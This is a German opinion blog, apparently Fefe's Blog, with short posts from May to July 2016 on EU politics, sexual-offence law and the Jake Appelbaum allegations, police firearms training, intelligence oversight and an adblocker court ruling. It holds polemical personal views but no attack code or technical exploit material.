Ich will euch jetzt mal ein Geheimnis verraten. Der Schulz will gar nicht, dass das demokratisch wird. Denn wenn das demokratisch wäre, wäre er dort nicht im Amt. Die SPD ist eine abgehalfterte Halbleiche auf dem Weg zum Abdecker. Schulz säße beim Bestattungsunternehmer auf dem Sofa und nicht im EU-Parlament, wenn es hier demokratisch zuginge.
Aber wartet, geht noch weiter:
Schulz schreibt, ein Problem der EU sei es, dass für die Bürger nicht klar sei, wer was tue. Oft werde die EU für Missstände verantwortlich gemacht, die auf die Beschlüsse der Regierungen der Mitgliedstaaten zurückzuführen seien.
Ja, stimmt. Beschlüsse dieser undemokratischen EU-Kommission. Die Kommissare sind aufgrund von Beschlüssen der Regierungen der Mitgliedsstaaten dort. Nicht weil die jemand gewählt hätte. Die machen dann alles kaputt.
Woher ich weiß, dass die und nicht das EU-Parlament alles kaputtmachen? Weil das Parlament keine Gesetze vorschlagen kann. Das kann nur die EU-Kommission. Glaubt ihr mir nicht? Googelt selbst!
Aber wo wir hier schon gerade Medienkompetenz machen, lege ich noch einen dicken Scheit ins Feuer:
Die EU solle sich nicht in Angelegenheiten einmischen, die national oder regional geregelt werden könnten, sondern sich auf jene Fragen konzentrieren, die die europäischen Staaten nur gemeinsam bewältigen könnten.
Das wären … gar keine. Diese Aussage ist gleichermaßen sinnlos, nichtssagend und bescheuert. Das ist der Quotenmitarbeiter unter den Aussagen in dem Artikel. Darauf werden sie später zeigen, wenn sie Kritiker als "EU-Skeptiker" und "Rechtspopulisten" beschimpfen. Dann werden sie sagen: Schaut her, wir haben doch gesagt, dass die EU bloß Dinge tun soll, die die EU tun sollte!1!!
So langsam frage ich mich, ob die Briten nicht Recht hatten mit ihrem Brexit. Dieser Schulz muss da weg.
PS: Ein „Parlament“, das keine Gesetze vorschlagen kann, ist wie ein Fahrrad, das nicht fahren kann.

Sat Jul 2 2016

[l] Die "Zeit" zum neuen Sexualstrafrecht. Als Illustration des bestehenden Sexualstrafrechtes schreiben sie über den Mauser-Fall:
Seine Verurteilung erfolgte allein aufgrund der Angaben einer 57-jährigen Professorin der Musikhochschule. Diese hatte Mauser angezeigt, sie vor sieben Jahren, im April 2009, bei einem Gesprächstermin in seinem Büro sexuell genötigt zu haben. Gleich zur Begrüßung habe er sie überraschend gegen die Tür gedrängt und ihr seine Zunge in den Mund geschoben. Trotzdem fand das Gespräch dann statt. In einem zweiten Überrumpelungsversuch habe er später ihre Hand an seine Hose über dem erigierten Penis gelegt und versucht, ihr unter den Rock zu greifen. Sie habe ihn verbal und durch Gegenwehr abgehalten, sagte die Frau aus, Mauser habe sich daraufhin wieder in seinen Sessel begeben. Beendet wurde die Situation durch das Eintreten eines Dritten, der aber keine Übergriffe bemerkte.
Obwohl es keine Tatzeugen gibt, die Frau weder aus dem Raum geflohen war noch um Hilfe gerufen hatte, ja die Unterredung nicht einmal abgebrochen und mit der Anzeige volle sechs Jahre gewartet hatte, wurde Mauser verurteilt. Der Pianist ist erledigt – durch die Anwendung geltender Gesetze.
Ich erinnere mich noch, wie ich mich vor ein paar Jahren darüber lustig gemacht habe, wie die Unis in den USA ihren Mitarbeitern sagen, sie sollen bitte niemals mit einer Frau alleine in einen Raum gehen, weil es gegen ausgedachte Vorwürfe des sexuellen Missbrauchs keine realistischen Abwehrchancen gibt. Ich habe damals gelacht und mir gedacht, naja, die USA, die sind halt ein Dritte-Welt-Land und kein Rechtsstaat. Bei uns undenkbar.
So kann man sich irren.
Und DAS ist der Zustand JETZT. VOR der Verschärfung des Sexualstrafrechts.

Fri Jul 1 2016

[l] Zu den Schusswaffen in den Händen der Polizei kommen hier noch einige spannende Hinweise rein.
Erstens: Der Videomitschnitt eines Vortrags an der Uni Frankfurt, bei der Night of Science 2016 zum Fällen von unbeabsichtigtem Schusswaffengebrauch bei der Polizei. In dem Video zeigen sie ein Testvideo über Wahrnehmung, das in dem Mitschnitt stark ruckelt. Nehmt an der Stelle einfach die Youtube-Version.
Und hier noch ein Hinweis von einem schlecht gelaunten Sportschützen (?):
Die Handhabungssicherheit bei Polizisten ist unter aller Sau. Weiß nicht, wie es in NRW ist, aber hier in BY müssen die Polizisten 3 - 4 Schießtermine (einer davon Schießprüfung) pro Jahr absolvieren. Dazu haben sie insgesamt 150 Schuß. In NRW ist die Trainingssituation AFAIK schlechter als in Bayern. In Berlin findet wegen schadstoffbelasteter und maroder Schießstände so gut wie kein reguläres Training mehr statt.
BTW: Ohne Schießprüfung darf kein Außendienst gemacht werden. Da man aber zu wenige Leute hat, schickt man auch Beamte auf die Straße, die ihre Waffen ungenügend beherrschen.
Zum Vergleich: Als Sportschütze muß man (behördlich vorgeschrieben) mindestens 12 - 18 Schießtermine pro Jahr im Schießbuch nachweisen können. Im Schnitt kommt ein durchschnittlicher Schütte aber auf wenigstens 25 - 30 Termine. Bei jedem Trainingstermin gehen im Schnitt 50 Schuß raus, vor und bei Wettkämpfen auch wesentlich mehr.
Sicher, behördlicher Waffeneinsatz unter Streß in der Öffentlichkeit ist eine andere Situation als ein Wettkampf. Trotzdem sind die meisten Polizeibeamten in Deutschland mMn nicht ausreichend an der Waffe qualifiziert - Sondereinheiten wie SEK, MEK, etc. mal ausgenommen.
(Danke, Mark und Heiko)

Wed Jun 29 2016

[l] Hacker hacken… eine ukrainische Bank via SWIFT. Es wirkt ein bisschen so, als müsse dieser SWIFT-Krempel mal entkernt und neu gemacht werden.

Mon Jun 27 2016

[l] Habt ihr euch eigentlich anlässlich des NSU-Skandals, des NSA-Skandals und der diversen (!) BfV-Skandale vielleicht gedacht, hey, da muss mal was passieren. Das mit der Geheimdienstaufsicht funktioniert offensichtlich nicht. Da muss mal jemand was machen?
Und als ihr dann gehört habt, dass es da jetzt eine Reform gibt, … habt ihr da gedacht: Das ist doch bestimmt reine Kosmetik?
Nun, ihr hattet natürlich völlig Recht. Die Geheimdienste haben ja gar nicht versagt. Die haben genau so gehandelt, wie ihre Auftraggeber in der Politik es wollten. Das ist Absicht, dass die Parlamentarier über die Giftmüllcontainer nicht informiert werden, denn sonst wären sie mitschuldig und müssten handeln.
Die ganzen übelriechenden radioaktiven Details könnt ihr wie üblich bei Netzpolitik.org nachlesen.
Aber, lasst es mich mal so formulieren… das ist kein Zufall, dass das zur EM "gemacht" wurde.
Im Grunde ist das nicht berichtenswert, denn es ändert sich ja nichts.
Aber auf der anderen Seite ist es ja schon berichtenswert, dass sich nichts ändert.

Sun Jun 26 2016

[l] Nachdem wir uns neulich über die Google-Anfragen der Briten lustig gemacht haben, sind jetzt die Amis dran.
Top trending questions on Hillary Clinton in the US last day.
1. Is Hillary Clinton going to jail?
2. What party is Hillary Clinton in?
3. Will Hillary win?
4. Why shouldn't you vote for Hillary Clinton?
5. Will Bernie support Hillary?

Thu Jun 23 2016

[l] Das BSI hat angeboten, Merkels Handy zu prüfen, und Merkel hat das abgelehnt.
Ich finde das nachvollziehbar. Ich würde dem BSI auch nichts zum Prüfen geben. Ich meine, das BSI hat auch beim Staatstrojaner mitgemacht. Wer kann denn so jemandem jemals wieder über den Weg trauen?
Siehste. Keiner.

Wed Jun 22 2016

[l] Ich habe übrigens erkannt, was ich all die Jahre falsch gemacht habe.
Ich habe mich nie aufrichtig mit Minderheiten solidarisiert.
Ich plädiere auf Unwissen. Mir hat einfach nie jemand die Regeln erklärt.
Daher hier nochmal für alle: "Wie du dich aufrichtig mit Minderheiten solidarisierst".

Tue Jun 21 2016

[l] Gute Nachrichten für Chrome-User: Microsoft hat die schlechte Energieeffizienz von Chrome jetzt zum zentralen Werbeargument für Edge gemacht. Chrome wird jetzt also massiv nachbessern. Und die Zahlen sind ja wirklich auffallend schlecht für Chrome.
Mich würde mal interessieren, wieviel davon ein reines Windows-Problem ist, und wie doll Chrome plattformübergreifend stinkt an der Stelle. Von Apple-Usern hört man ja auch, dass ein Laptop im Akku-Modus mit Safari deutlich länger durchhält als mit Chrome.
Ich habe das bisher nicht gemessen, aber mir ist unter Linux aufgefallen, dass die Videocodecs in Firefox schlecht sind (wobei das vermutlich vp9 ist). Youtube in Fullscreen (4k) flutscht mit Chrome, aber mit Firefox ruckelt und wackelt es.
Nur mal so als Datenpunkt muss ich aber sagen, dass ich die längste Batteriezeit beim Webklicken bisher mit Chromebooks erlebt habe.

Fri Jun 17 2016

[l] Oh, ach? Ein Einsender zu der Hooligan-Geschichte:
In der französischen Presse wird die Sache komplett anders dargestellt als von dir (180° anders). Dort wird mehrfach über Verurteilungen im Eilverfahren gegen englische Hooligans berichtet, inklusive Einreiseverbot und Stadionverbote. Auch ein französischer Hooligan muss ein Jahr ins Gefängnis, ohne Bewährung!
Kein einziger russischer Hooligan, der in Marseille an den Krawallen beteiligt war, wurde bislang strafrechtlich belangt (anscheinend wurde noch nicht mal einer verhaftet).
Liberation
Le Figaro
Sports.ft
France Soir
Ich kann also wirklich keine anti-russiche Verschwörung erkennen. Wenn überhaupt stellt sich die Frage, wie die in Frankreich angesichts der Krawallen noch unbehelligt herumlaufen und sich von Spielort zu Spielort weiterprügeln können…
Wieso ist denn das dann in unseren Medien so ein Thema mit den russischen Fans, wenn die sich anscheinend nicht mal krass genug daneben benehmen, um vor Ort verhaftet zu werden?!
Update: Der Einsender legt nach:
Also meine Einsendung war jetzt nicht so gemeint, dass die französische Presse das so interpretiert, dass die Russen sich dort nichts zu schulden haben kommen lassen, eigentlich im Gegenteil. Es scheint schon ziemlich offensichtlich, dass die Russen vermutlich noch härter und krasser vorgingen. Sie ließen sich halt nur nicht so einfach erwischen bzw. die Polizei war nicht gut genug, um sie zu verhaften (was ja auch in der deutschen Presse wie z.b. in deinem Ursprungslink kritisiert wurde).
Im Libération-Artikel, den ich dir geschickt habe, ist zum Beispiel davon die Rede, dass die Russen extrem trainiert, koordiniert und gut vorbereitet waren. Sie haben zum Beispiel nicht den Fehler gemacht in Marseille am Flughafen zu landen, auf den sich der französische Sicherheitsapparat vollkommen konzentriert hat (in Sachen Einreisechecks, Kontrollen, Tätererkennung ex post durch Videokameras, etc.).
Was ich in England, wo ich wohne (lese aber viel französische Presse privat), so in ein paar Londoner und Gesamtbritischen Blättern bemerkt habe, ist dass die Presse hier die Engländer viel weniger hart ran nimmt als die französischen Hooligans (die laut der lokalen Presse hier anscheinend gezielt die Engländer provozierten), oder auch die Russen.
Ich denke also, dass es einen Tenor in der gesamten westeuropäischen Presse gibt der sich über die russischen Fans aufregt, aber eben auch sehr begründet und eher darauf fußend, dass die Leute es so wahrnehmen, dass die Russen sich noch krasser daneben benommen haben, aber eben keiner belangt wird. Selbst die, die korrekterweise davon ausgehen, dass sich sowohl Russen, Engländer als auch Franzosen daneben benommen haben, können sich halt darüber aufregen, dass nur die Engländer und Franzosen belangt werden.
Jemand anderes kommentiert in die selbe Richtung:
Bei uns in der Schweiz tönt die Presse so: Die Russischen Schläger waren trainiert und organisiert, im Gegensatz zu den Briten, die vor allem betrunken waren. Weil sie zu hart für die nicht darauf vorbereitete Polizei waren konnten sie (bei den Krawallen) vorerst nicht festgenommen werden. Sie haben sich also zu krass benommen, nicht „nicht krass genug“.

Thu Jun 16 2016

[l] Ein "Computerfehler" hat eine Datenbank bei der Air Force kaputtgemacht. Die Datenbank beinhaltete die Daten über laufende Beschwerdeverfahren wegen Betrug und Korruption und so weiter. Die Air Force hat diese Datenbank nicht selber betrieben, sondern von Lockheed Martin betreiben lassen.
Ein Schelm, wer Böses dabei denkt.

Fri Jun 10 2016

[l] Am Wohnort von Jake Appelbaum hat jemand vom Lynchmob "A rapist lives here" als Graffiti an die Wand gemalt.
Also ich weiß ja immer noch nicht, welche Seite jetzt lügt und welche nicht. Aber ich weiß, dass ich ganz bestimmt nicht auf der Seite derer stehen möchte, die solche Graffitis anbringen.
(Ich weiß nicht, wo Jake wohnt, und ob das tatsächlich sein Wohnort ist)
Update: Beachtet auch diesen Kommentar darunter:
@Shidash @ioerror so obviously done by jake and his pals

Wed Jun 8 2016

[l] Diese Jake-Story blubbert inzwischen immer weiter, immer mehr Vorwürfe kommen dazu. Ich privat bin inzwischen auch soweit, die für glaubwürdig zu halten. Erstens weil sie auf mich nicht übertrieben wirken ("ich lag neben ihm im Bett und war bewusstlos und er hat mich begrapscht" klingt für mich glaubwürdig, das kann ich mir als Situation vorstellen) und zweitens weil da jetzt Namen dranstehen, und das sind tatsächlich alles Leute aus der amerikanischen infosec-Szene.
Für mich persönlich war der Wendepunkt, als ich Jakes überspezifisches Dementi sah. Ich hatte das als Update an meinen letzten Beitrag dazu drangehängt. Dort schreibt Jake, er habe "sich keine kriminellen Übergriffe zu Schulden kommen lassen". Dieses Wort, kriminell, an der Stelle, das sagt mir, dass er die Übergriffe nicht bestreitet, aber sie für nicht so schlimm hält, jedenfalls nicht für Straftaten. Das mag daran liegen, dass das angeblich so schwache Sexualstrafrecht in Deutschland in den USA so eine Art Mem bei Diskussionen über Vergewaltigungen ist. So ala "in Deutschland wäre das nicht strafbar". Ich halte es für möglich, dass Jake das ein paar Mal gehört hat, und als er dann in Deutschland war, hat er das halt gemacht.
ALLERDINGS gilt immer noch die Unschuldsvermutung. Bis eine Staatsanwaltschaft Anklage erhoben, die Polizei ermittelt und ein Richter ihn verurteilt hat, ist Jake unschuldig.
Was mich gerade an dieser Geschichte richtig auf die Palme bringt, ist dass das Tor-Projekt Jake anscheinend 2015 schon mal suspendiert hat wegen Vorwürfen in diese Richtung. WTF? Und sie sagen niemandem was?!
Und während wir hier über Jake diskutieren, passiert in den USA das hier: Ein Sportler an der Elite-Uni Stanford vergeht sich an einer bewusstlosen Frau, kriegt nur 6 Monate Gefängnis. Die US-Presse regt sich jetzt über seinen Vater auf, der zu Protokoll gab, er fände schon die 6 Monate viel zu viel, sein Sohn habe ja bloß "20 minutes action" gehabt und überhaupt sei die Frau ja bewusstlos gewesen und habe gar nichts mitgekriegt. Das ist natürlich völlig absurd, aber ich finde, man muss den Vater hier in Ruhe lassen. Es geht um seinen Sohn, da handelt kein Vater rational. Von den 6 Monaten muss dieser Vergewaltiger nur 3 tatsächlich hinter Gitter. Das erscheint mir in der Tat ein viel zu geringes Strafmaß. Zum Vergleich: In Großbritannien ist die durchschnittliche Strafe für Vergewaltigung 8 Jahre Knast. Für die USA finde ich gerade nur Zahlen aus den 90er Jahren, da waren es 11 Jahre Knast (davon aber nur die Hälfte tatsächlich hinter Gittern bei guter Führung).
Zusammenfassend muss ich sagen, dass ich entsetzt bin, dass a) in dieser ach so zivilisierten Welt Vergewaltigung überhaupt noch ein Problem ist, dass es dort b) so eine Drei-Affen-Kultur gibt und niemand Anzeige erstattet und c) dass Kinder aus gutem weißen Hause dann bevorzugt werden. Wo sind wir den hier bitte!? Mehrere der Vorwürfe gegen Jake beziehen sich auf eine Hotellobby 20m vom CCC-Kongress entfernt. Das müssen Dutzende von Zeugen gesehen haben! Und KEINER sagt was!? Wir haben auf dem Congress Security, die hätte Jake gewaltsam vom Gelände entfernt, wenn jemand was gesagt hätte. Was zur Hölle?! Und die fragen sich jetzt, was sie falsch gemacht haben, dass die Opfer ihnen nicht genug Vertrauen entgegen bringen in so einer Situation. Auf allen Seiten nur Verlierer bei der Story.
(Den Begriff der Rape Culture lehne ich immer noch ab, weil er die guten Menschen beschmutzt, die bereit standen um einzugreifen, und denen niemand was gesagt hat)

Tue Jun 7 2016

[l] Zu meinen Ausführungen zum Berliner Schulsystem kam noch ein länglicher Kommentar rein, den ich hier wiedergeben möchte:
Bevor ich meine Brötchen mit Programmierung verdient habe, war mein Studienschwerpunkt "Bildungsplanung" - OK, ist fast 40 Jahre her. Das war damals schon kein anständiger Beruf, weil Dank des Föderalismus jedes Land eh sein eigenes Ding machte, aber damals wollte zumindest der Bund professionell beraten werden: "Die Schule der Nation ist die Schule" - sagte Willy Brandt - und meinte das ernst. Goldene Zeiten, in denen jede Menge neue Schulen und Unis gebaut, Lehrer und Dozenten en masse eingestellt wurden (wenn sie nicht Berufsverbot kriegten). Die einzige Zeit, in der das Bildungssystem durchlässiger wurde, und das hat die Politik damals so gewollt.
Du hast Recht, dass es heute nicht mehr so ist. Recht hast du auch mit der Beschreibung des politischen Personals, aber mit der Aussage, die Rentner sollten gegenüber der Jugend bevorzugt werden, liegst du daneben. Dazu gibt es zu viele Frühverrentungen, werden zu viele Alte gezielt in die Armut abgeschoben. Der Gegensatz "Alt gegen Jung" ist konstruiert, er dient als Argument für Rentenkürzungen ("die junge Generation braucht mehr Ganztagsschulen") und Kürzungen bei Erziehung und Bildung ("die Rentner kosten zu viel") gleichermaßen. Ja was denn nun?
In Wirklichkeit wird an Allem gespart, was keinen Profit verspricht - die Daseinsfürsorge des Staates bietet sich als Opfer einer neoliberalen Agenda doch perfekt an! Ich will jetzt nicht mit Zahlen um mich schmeißen, aber die Zeiten der Vollbeschäftigung sind lange vorbei, viele Menschen werden nur noch als Konsumenten gebraucht. Und im Supermarkt oder bei Amazon sind umfassend gebildete Menschen nun mal überqualifiziert; schlimmer noch: sie könnten was merken.
Du reisst dir mit dem Blog ja den Arsch auf, damit die Leute lernen, eins und eins zusammen zu zählen - so von wegen Medienkompetenz. Logarithmen braucht's dafür nicht, aber ein Verständnis für Zusammenhänge. Genau das wird durch die Verschulung der Unis und das Runterbrechen von Allgemeinbildung auf "Kernkompetenzen" kaputt gemacht. Ganz im Sinne unserer schönen neuen Welt geht es nur noch um Effizienz, und wie erreicht man die: genau, durch Wettbewerb.
Passt doch prima zusammen: staatliche Infrastruktur wird in den "freien" Markt entlassen, weil der bekanntlich alles zum Besten regelt. Für gewisse Kreise funktioniert das auch: mit ca. 10% liegt der Anteil der Schüler von Privatschulen so hoch wie nie, und bei den Unis suchen die Studenten reicher Väter gezielt nach den Elite-Instituten - dafür gibt's Rankings von Burda & Co., die Politik nennt das "Exzellenzinitiative". Umgekehrt wird ein Schuh draus: in der Breite, für uns Normalos, wird auf Biegen und Brechen gespart, das Geld geht an die Eliten.
Solche Ideen werden u.A. von modernen Bildungsplanern entwickelt - nicht beim Staat, sondern beispielsweise bei der Bertelsmann-Stiftung. Da sage noch einer, die Privaten seien nicht effizient! Die Agenda dieser Vögel ist überall gleich, nicht umsonst stöhnst du lustvoll auf, wenn "der Staat" sich mal wieder die Pest in Form privater Wirtschaftsberater in's Haus holt. Mit der Bildungsberatung sind die Bertelsstifter sehr erfolgreich: ich frage mich seit Jahren, wer bei RTL eigentlich die Werbung mit debilen Einspielungen von "Bauer sucht Frau" oder DSDS guckt - nun, genau die Opfer des Systems, welches die Stiftung unseren Politnasen seit Jahrzehnten verkauft.
Meine Generation ist zwar mit spätestens 58 Jahren nicht mehr "vermittelbar" und gerät ziemlich flächendeckend in die Altersarmut, aber ich bin der letzte, der nicht bessere Schulen für die Jungen fordert, denn die sollen meine Rente verdienen und, vor allem, eins und eins zusammenzählen können, damit sie merken, wer uns gegeneinander ausspielen will, damit er den Reibach macht, ohne dass wir Einspruch erheben.

Mon Jun 6 2016

[l] Gerade kommt hier eine Mail rein, die mich sehr gefreut hat. Da bestreitet nämlich jemand das Statement, die Polizei versage bei Vergewaltigungsvorwürfen immer. Hier ist, was er schreibt:
Ich bin in meiner Freizeit ehrenamtlicher Rettungssanitäter beim Roten Kreuz und habe dadurch leider öfter als mir lieb ist mit diesem Thema zu tun.
Es mag schon sein, dass die Polizei leider viel zu oft versagt, aber gerade bei diesem Thema ist die Polizei mehr als genau. Es wird jede Anzeige zu diesem Thema genauestens protokolliert und dokumentiert. Die Polizisten sind speziell darauf geschult, mit solchen Leuten umzugehen. Das bedeutet, dass die Beanten genaue Abfrageschemata haben, um den Leuten, die nicht gerne darüber reden wollen, zu helfen. Es wird den Anzeige stellenden Personen die Zeit gegeben, die sie brauchen, um den Tatvorgang zu schildern, und so nachgefragt, um Ungenauigkeiten auszuschließen und zu minimieren.
Wie gesagt, ich will die Polizei hier nich in Schutz nehmen, aber das Argument "Bei Vergewaltigung macht die Polizei eh nix" ist definitiv falsch.
Ich fände es super, wenn wir zu der Fragestellung mal ein paar Details kriegen könnten, gerne auch von einem Polizisten. Einfach mal anhand eines fiktiven Falls durchexerzieren, was gemacht wird, in welcher Reihefolge, und warum.
[l] Zu Jake Appelbaum kamen wenig überraschend Dutzende von Mails rein. Natürlich einige davon das Übliche, von Leuten mit Leseschwäche, die mir unterstellen, ich würde Vergewaltigung relativieren oder Victim Blaming betreiben. Daber habe ich extra explizit mit
Zu den Vergewaltigungsvorwürfen kann ich nichts sagen
aufgemacht, damit auch wirklich dem letzten Lesekompetenz-Durchfaller klar ist, dass sich das Folgende auf die anderen Vorwürfe bezieht.
Dass die anderen Vorwürfe in dem verlinkten Tor-Artikel nicht vorkommen, liegt daran, dass ich diesen Pranger nicht verlinken will. Pranger sind Scheiße und ich spiele so etwas keine Aufmerksamkeit zu. Selbst wenn die inhaltlich Recht haben, und zwar auch mit den Vergewaltigungsvorwürfen, was ich nicht ausschließen kann.
Die Frage der Stunde sollte nicht sein, wer jetzt an was Schuld hat, sondern was wir an den Prozessen in der Community verbessern können. Wie können wir in Zukunft dafür sorgen, dass niemand glaubt, er müsse einen anonymen Internet-Pranger aufmachen, weil die anderen Optionen alle nicht wirken?
Zu den anonymen Anschuldigungen sind jetzt auch noch welche mit Namen dran gekommen, von Nick Farr. Nick hat jahrelang auf dem Congress und dem Camp mitgeholfen und ist in der Szene wohlbekannt und geschätzt. Nick wirft Jake jetzt Bullying vor und sagt, dass er deswegen nicht mehr zu den Congressen gekommen ist. Das hat mich relativ stark mitgenommen, weil ich nicht verstehen kann, wieso ich das jetzt Jahre später in so einem Kontext hören muss und nicht schon vorher. Nick sagt, er habe mit den Leuten gesprochen, denen er vertraut hat, und die hätten ihm nicht geholfen. Nicht nur das, die haben das auch unter Verschluss gehalten, den Buschfunk hat es nicht erreicht und bei mir kam es nie an.
Ob das jetzt inhaltlich stimmt oder nicht, ist nicht so einfach zu beantworten. Ich kenne Nick ungefähr so gut wie ich Jake kenne, ein paar Mal getroffen und unterhalten, eher aus der Ferne. Nick schien mir immer ein netter Kerl zu sein. Und dass er sich mit seinem Namen hinter seine Vorwürfe stellt, macht sie natürlich gleich viel glaubwürdiger. Aber es bleiben erstmal Vorwürfe, und solange ich da keinen Einblick habe, was wirklich passiert ist (und leider sind beispielsweise die Drohzettel aus seinem Hotel verloren gegangen und liegen nicht mehr als Beweismittel vor), kann ich das auch nicht intrinsisch höher bewerten als Jakes Unschuldsvermutung.
Ich ärgere mich gerade über zwei Dinge. Erstens über mich selbst, dass meine erste Reaktion ist: Der Jake ist doch schon immer ein Arschloch, habt ihr das nicht gemerkt? Das stimmt zwar und ist in diesem Fall auch richtig, aber was wenn der nächste ein freundlicher, wohlgekleideter, beredter Mensch ist? So jemand wie Nick Farr? Das kann man nicht immer vorher erkennen.
IN DIESEM FALL hätte man es vorher erkennen können, und meine Äußerungen stehen daher. Aber das Problem ist ja ein tiefer sitzenderes.
Die andere Sache, über die ich mich ärgere: Dass ich Jake das gönne, dass er bei Tor rausfliegt. Und ich weiß genau so wenig wie ihr, was an diesen Vorwürfen dran ist. Ich rede hier von der Unschuldsvermutung, aber emotional kann ich mich da selber nicht dran halten.
Ich bitte daher alle darum, diese konkreten Vorwürfe von "ich fand Jake schon immer doof" zu trennen, denn das scheint mir in der Community gerade Tenor zu sein. Einige Leute fangen jetzt an, Schmutz gegen Jake zu sammeln, der mit diesen Vorwürfen nichts zu tun hat.
Ich persönlich kann mit "der hat mich emotional ausgenutzt" als Vorwurf nichts anfangen. Zum Ausnutzen gehören immer mindestens zwei. Einer, der ausnutzt. Einer, der sich ausnutzen lässt. Und dann noch n Zuschauer, die nicht eingreifen. Jeder davon hat eine Verantwortung bei sowas. Man kann das nicht jahrelang geschehen lassen und dann mit dem Finger zeigen.
In einigen Mails kam das Argument, was denn sei, wenn man nicht weggehen kann, beispielsweise weil das der Arbeitsplatz ist. Mein Rat: GERADE DANN muss man weggehen. Das ist deine Lebenszeit! Die gibt dir keiner wieder, wenn du die so einem emotionalen Vampir opferst! Und da kannst du auch danach niemandem die Schuld zuschieben als dir selbst. Wenn du schon dir selbst gegenüber nicht genug Wertschätzung und Respekt aufbringen kannst, um dich aus solchen Situationen zurückzuziehen, wie kannst du es dann von Außenstehenden erwarten?
Das liegt vielleicht an meiner Sozialisierung und meinen Erfahrungen bisher, aber ich habe Schuldzuweisungen immer als Abwehrhandlung erlebt, mit denen jemand von seiner eigenen Verantwortung in der Sache ablenken wollte.
Zusammenfassung: Die Lage ist komplex und schwierig zu beurteilen. Lasst uns bitte von den Schuldzuweisungen wegkommen und gemeinsam überlegen, was man in Zukunft machen kann. Lasst uns überlegen, wie wir in Zukunft dafür sorgen können, dass sowas ohne Internetpranger geklärt werden kann.
Update: Eine Sache noch. Ich schreibe häufig, man soll halt zur Polizei gehen, und da kommt dann jedesmal der Hinweis, ich wisse nicht, wovon ich spreche, weil die Polizei in solchen Fällen total versagt und niemandem weiterhilft. Weiß ich. Trotzdem. Gerade dann ist es wichtig, dass die Statistik entsprechend aussieht. Wenn wir nicht hingehen, dann steht in deren Statistik, dass sowas nicht vorkommt, und dann kommt der Innenminister und streicht das bisschen Geld für den Bereich auch noch weg.
Dann gibt es da noch das Argument, dass es Überwindung kostet, zur Polizei zu gehen, wenn einem die Story peinlich ist. Klar. Aber das ist kein Argument. Du gehst ja nicht FÜR DICH zur Polizei, um Rache zu üben. Du gehst zur Polizei, damit jemand diesen Typen aus dem Verkehr zieht, damit nicht noch andere zu Schaden kommen. Wenn es nur um dich selbst ginge, dann wäre das ein Argument. Tut es aber nicht. Wenn ein Täter das nächste Opfer vergewaltigt, und du bist zur Polizei gegangen und die haben nichts gemacht, dann ist das deren Verkacken. Wenn du gar nicht erst hingegangen bist, ist es dein Verkacken. Aus meiner Sicht gibt es die Option "nicht hingehen" nicht, egal wie peinlich oder schwierig das ist und egal wie unwahrscheinlich es ist, dass die helfen. Als Opfer weißt du aus erster Hand, wie Scheiße das ist, Opfer zu sein. Es ist deine verdammte Pflicht, dafür zu sorgen, dass das anderen erspart bleibt.
Stellt euch mal vor, eure Tochter/Nichte wird vergewaltigt, und ihr erfahrt danach, dass es seit Jahren entsprechende Geschichten über den gibt, aber die anderen Opfer sind nicht zur Polizei gegangen. Hättet ihr dann nicht vergleichbar viel Hass auf den Täter wie auf die, die ihn nicht angezeigt haben?
Update: Jake Appelbaum hat sich zur Sache geäußert.

Fri Jun 3 2016

[l] Also DAMIT konnte ja wohl NIEMAND rechnen: S21 kostet 600 Millionen mehr und dauert länger.
Wieso lassen wir das nicht die Schweizer machen? Die, die den Gotthard-Tunnel gemacht haben? Die waren früher fertig und blieben im Budget.
[l] Die Ölhändlerbranche hat sich anscheinend großflächig von Yahoo Messenger abhängig gemacht, und jetzt haben die Muffensausen, dass Yahoo pleite gehen könnte.
Denkt euch den erhobenen Zeigefinger mit Cloud und Single Point of Failure und unnötig von anderen abhängig machen dazu :-)

Fri May 27 2016

[l] Wenn er sich schon nicht für die Atombombe entschuldigt, was hat Obama dann in Hiroshima gemacht? Eine Welt ohne Atomwaffen gefordert.
Hey, Obama, tolle Idee! Mach doch mal!

Thu May 26 2016

[l] Ich fragte die Tage, wieso sich Obama eigentlich bei seinem historischen Hiroshima-Besuch nicht für die Atombombe entschuldigen will.
Heute hat die Süddeutsche eine einleuchtende Erklärung dafür: Die Japaner haben darum gebeten, dass er es nicht tut.
Nanu? Nun, wie sich rausstellt, wünscht sich die japanische Bevölkerung mit knapper Mehrheit (56%) eine Entschuldigung, aber die Politik hat im Vorfeld schon abgewunken, sie wollen keine. Und zwar deshalb, weil die Japaner die Aufarbeitung ihrer eigenen Kriegsverbrechen bisher wunderschön unter den Teppich der Trümmer von Hiroshima kehren konnten. Auf der (länger widerlegten) Lüge, dass die Bombe notwendig war oder gar unterm Strich Leben gerettet habe, haben Japan und die USA eine Militärallianz aufgebaut, und haben die Japaner sich in ihrem Selbstverständnis vom Täter zum Opfer umgedichtet nach dem Krieg. Das wäre jetzt alles gefährdet.
Wie widersprüchlich die Nische ist, in der es sich Japan bequem gemacht hat, haben sie in diesem Absatz schön zusammengefasst:
In internationalen Gremien tritt Japan - als das einzige Opfer von Atombomben - für die nukleare Abrüstung ein. Aber seine Sicherheitspolitik stützt sich wesentlich auf den atomaren Schutzschild der USA. Die Regierung in Tokio nutzt die Hibakusha aus, um Japans Opferrolle zu belegen, vernachlässigt sie aber sonst. Viele Betroffene mussten sich Hilfe vor Gericht erstreiten, manchen wurde sie verweigert.

Sun May 22 2016

[l] Was das LG/OLG Hamburg für Medienrecht, das ist das OLG Köln für Wettbewerbsrecht. Auch bei den angeblichen Raubkopierer-Verfolgern ist Köln ein beliebter Standort. Und jetzt sieht es so aus, als konstruiere das OLG Köln spontan ein Wettbewerbsverhältnis zwischen Adblock-Plus-Hersteller Eyeo und dem Axel-Springer-Verlag, weil, äh, … sie in das Geschäftsmodell der werbetreibenden Webseiten eingreifen!
Und dank des Ende 2015 neu gefassten Paragrapen 4a des Gesetzes gegen den unlauteren Wettbewerb findet das Gericht auch, dass Eyeo sich der "aggressiven geschäftlichen Handlungen" schuldig gemacht hat.
Ich für meinen Teil findet ja nicht, dass man da groß konstruieren muss, um ein Wettbewerbsverhältnis zu finden. Eyeo hat ein schleimiges Geschäftsmodell, bei dem sie Werbung verkaufen, das durch ihre Blocker durchkommt. Axel Springer verkauft Werbung. Wenn sich zwei an die selben Kunden richten, gibt es ein Wettbewerbsverhältnis.
Ich für meinen Teil finde es daher in Ordnung, wenn Eyeo zugemacht wird.
Was mich allerdings ärgert, ist dass die jetzt über den Weg auch Easylist wegbomben wollen, und das ist auch für bessere Adblocker wie ublock die Basis. (Danke, Merkel und Gabriel! Wer hat die noch gleich gewählt?!)
